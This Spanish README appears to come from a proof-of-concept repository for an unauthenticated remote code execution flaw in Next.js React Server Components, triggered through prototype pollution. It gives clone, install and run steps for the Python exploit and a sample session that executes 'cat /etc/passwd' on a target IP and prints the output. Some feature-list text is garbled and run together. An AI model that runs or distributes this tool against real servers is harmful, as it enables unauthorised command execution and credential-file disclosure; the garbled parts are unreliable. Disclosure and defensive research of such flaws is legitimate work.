
React2Shell (CVE-2025-66478): Un concepto de prueba basado en Python para la Ejecución Remota de Código (RCE) crítica en los Componentes del Servidor de Next.js. Cuenta con una interfaz CLI interactiva, inyección de payload personalizada y un formato de salida más limpio. Solo con fines educativos de investigación.
Ejecución Remota de Código (RCE) en Next.js mediante Contaminación de Prototipos en Componentes del Servidor
Este repositorio contiene una Prueba de Concepto (PoC) para CVE-2025-66478 (también referenciada como CVE-2025-55182 en algunos contextos), una vulnerabilidad crítica que afecta a aplicaciones Next.js que utilizan versiones específicas de React Server Components (RSC).
Al manipular el proceso de serialización de RSC, un atacante no autenticado puede inyectar una carga útil maliciosa mediante contaminación de prototipos (__proto__:then). Esto puede llevar a la ejecución de comandos arbitrarios del sistema en el servidor a través de child_process.execSync.
Desarrollado por: ArkhamKnight47
multipart/form-data requerida.1:E{"digest":...}).\n vs \r\n) para una salida limpia en objetivos Windows y Linux.requests# Clone the repository
git clone https://github.com/RavinduRathnayaka/CVE-2025-55182-PoC.git
cd CVE-2025-55182-PoC
# Install dependencies
pip install requests
python CVE-2025-66478.py
Se te solicitará:
http://localhost:3000id, whoami, cat /etc/passwd[?] TARGET URL > http://192.168.1.5:3000
[?] COMMAND > cat /etc/passwd
[*] EXECUTING EXPLOIT...
[+] PAYLOAD SUCCESSFUL. OUTPUT BELOW:
============================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin
============================================================
Esta herramienta se proporciona únicamente con fines educativos y de investigación en seguridad.
El autor (ArkhamKnight47) no asume ninguna responsabilidad por el mal uso de este código. Probar este exploit contra sistemas que no posees o para los cuales no tienes permiso explícito es ilegal y no ético.
Úsalo con responsabilidad. Aprende éticamente. Asegura tu stack.